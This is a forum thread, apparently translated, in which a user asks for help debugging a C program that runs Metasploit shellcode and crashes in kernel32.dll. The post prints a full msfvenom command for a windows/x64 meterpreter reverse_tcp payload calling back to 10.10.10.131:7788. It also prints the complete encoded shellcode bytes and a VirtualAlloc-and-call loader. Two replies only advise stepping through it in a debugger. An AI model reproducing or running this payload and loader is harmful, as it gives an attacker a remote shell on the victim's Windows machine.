kernel32.dll 0xC0000005: Access violation executing location 0x0000000076E3A404

    SgtDaJim · 2016-11-29 01:55:10 +08:00 · 1847 views

    Yet another question about executing shellcode from C..
    The shellcode was generated with msfvenom: windows/x64/meterpreter/reverse_tcp. Note that it is the x64 version.

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.131 lport=7788 -b "\x00\x0a\x0d" --platform windows -f c
    No Arch selected, selecting Arch: x86_64 from the payload
    Found 2 compatible encoders
    Attempting to encode payload with 1 iterations of generic/none
    generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
    Attempting to encode payload with 1 iterations of x64/xor
    x64/xor succeeded with size 551 (iteration=0)
    x64/xor chosen with final size 551
    Payload size: 551 bytes
    Final size of c file: 2339 bytes

    C code:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memcpy */
    #include <windows.h>
    
    /* run this program using the console pauser or add your own getch, system("pause") or input loop */
    
    unsigned char buf[] =
    "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff"
    "\xff\xff\x48\xbb\x62\x68\x19\xad\x30\x9b\xd1\x92\x48\x31\x58"
    "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x9e\x20\x9a\x49\xc0\x73"
    "\x1d\x92\x62\x68\x58\xfc\x71\xcb\x83\xc3\x34\x20\x28\x7f\x55"
    "\xd3\x5a\xc0\x02\x20\x92\xff\x28\xd3\x5a\xc0\x42\x20\x92\xdf"
    "\x60\xd3\xde\x25\x28\x22\x54\x9c\xf9\xd3\xe0\x52\xce\x54\x78"
    "\xd1\x32\xb7\xf1\xd3\xa3\xa1\x14\xec\x31\x5a\x33\x7f\x30\x29"
    "\x48\xe5\xbb\xc9\xf1\x19\x20\x54\x51\xac\xe0\xfd\x50\xea\x7a"
    "\x63\x1b\xa2\xb5\xe9\xd1\x92\x62\xe3\x99\x25\x30\x9b\xd1\xda"
    "\xe7\xa8\x6d\xca\x78\x9a\x01\xc2\xe9\x20\x01\xe9\xbb\xdb\xf1"
    "\xdb\x63\xb8\xfa\xfb\x78\x64\x18\xd3\xe9\x5c\x91\xe5\x31\x4d"
    "\x9c\xa3\xab\x20\x28\x6d\x9c\xda\x10\x5b\x6f\x29\x18\x6c\x08"
    "\x7b\xa4\x63\x2e\x6b\x55\x89\x38\xde\xe8\x43\x17\xb0\x41\xe9"
    "\xbb\xdb\xf5\xdb\x63\xb8\x7f\xec\xbb\x97\x99\xd6\xe9\x28\x05"
    "\xe4\x31\x4b\x90\x19\x66\xe0\x51\xac\xe0\xda\x89\xd3\x3a\x36"
    "\x40\xf7\x71\xc3\x90\xcb\x23\x32\x51\x2e\xdc\xbb\x90\xc0\x9d"
    "\x88\x41\xec\x69\xc1\x99\x19\x70\x81\x52\x52\xcf\x64\x8c\xdb"
    "\xdc\x1f\x6a\x9f\x6f\xa8\xe3\x92\x62\x29\x4f\xe4\xb9\x7d\x99"
    "\x13\x8e\xc8\x18\xad\x30\xd2\x58\x77\x2b\xd4\x1b\xad\x2e\xf7"
    "\xdb\x98\x68\xeb\x58\xf9\x79\x12\x35\xde\xeb\x99\x58\x17\x7c"
    "\xec\xf7\x95\x9d\xbd\x55\x24\xda\xf3\xd0\x93\x62\x68\x40\xec"
    "\x8a\xb2\x51\xf9\x62\x97\xcc\xc7\x35\xda\x8f\xc2\x32\x25\x28"
    "\x64\x7d\xaa\x11\xda\x9d\xa8\x51\x24\xf2\xd3\x2e\x52\x2a\xe1"
    "\xd8\xec\x8a\x71\xde\x4d\x82\x97\xcc\xe5\xb9\x5c\xbb\x82\x23"
    "\x30\x55\x24\xd2\xd3\x58\x6b\x23\xd2\x80\x08\x44\xfa\x2e\x47"
    "\xe7\xa8\x6d\xa7\x79\x64\x1f\xe7\x87\x80\x8a\xad\x30\x9b\x99"
    "\x11\x8e\x78\x51\x24\xd2\xd6\xe0\x5b\x08\x6c\x58\xf5\x78\x12"
    "\x28\xd3\xd8\x6a\xc0\x65\x6f\x64\x04\x11\x9a\x68\x67\xf8\x78"
    "\x18\x15\xb2\x3c\xe1\xef\xc7\x70\xda\x88\xfa\x62\x78\x19\xad"
    "\x71\xc3\x99\x1b\x90\x20\x28\x64\x71\x21\x89\x36\x31\x8d\xe6"
    "\x78\x78\x12\x12\xdb\xeb\xaf\x54\x9c\xf9\xd2\x58\x62\x2a\xe1"
    "\xc3\xe5\xb9\x62\x90\x28\x60\xb1\xd1\xf2\xcf\x4e\x52\x6a\x62"
    "\x15\x31\xf5\x71\xcc\x88\xfa\x62\x28\x19\xad\x71\xc3\xbb\x92"
    "\x38\x29\xa3\xa6\x1f\x94\xe1\x6d\xb7\x3f\x40\xec\x8a\xee\xbf"
    "\xdf\x03\x97\xcc\xe4\xcf\x55\x38\xae\x9d\x97\xe6\xe5\x31\x58"
    "\x99\xbb\xa4\x20\x9c\x5b\x45\x2f\x90\x6d\x85\x30\x73\xad\x69"
    "\xd2\x16\x50\x92\xdd\xbb\xfb\xcf\x4e\xd1\x92";
    
    
    int main(void) {
        printf("Execute meterpreter shellcode.....\n");
        /* Reserve and commit a readable/writable/executable region large enough for the buffer. */
        PVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (Memory == NULL) {
            fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
            return 1;
        }
        /* Copy the bytes into the executable region and call them as a function. */
        memcpy(Memory, buf, sizeof(buf));
        ((void(*)())Memory)();
        return 0;
    }
    

    Then in VS2013 I changed the solution platform to x64 and ran it in Debug. At first it works normally, but after a few seconds this appears:

    0x0000000076E3A404 ( kenerl32.dll )(xxx.exe 中)处有未经处理的异常:
    0xC0000005: 执行位置 0x0000000076E3A404 时发生访问冲突

    How should I fix this? Thanks, everyone.

    2 replies

    xss · #1 · 2016-11-29 10:00:42 +08:00
    You should single-step through it first and see exactly where in the shellcode the exception happens.

    With just that error message, I doubt anyone will be interested in debugging it for you.

    SgtDaJim (OP) · #2 · 2016-11-29 11:01:52 +08:00
    @xss OK.. I've never used VS.. I don't know how to use it.. I'll search Baidu and fumble through it tonight..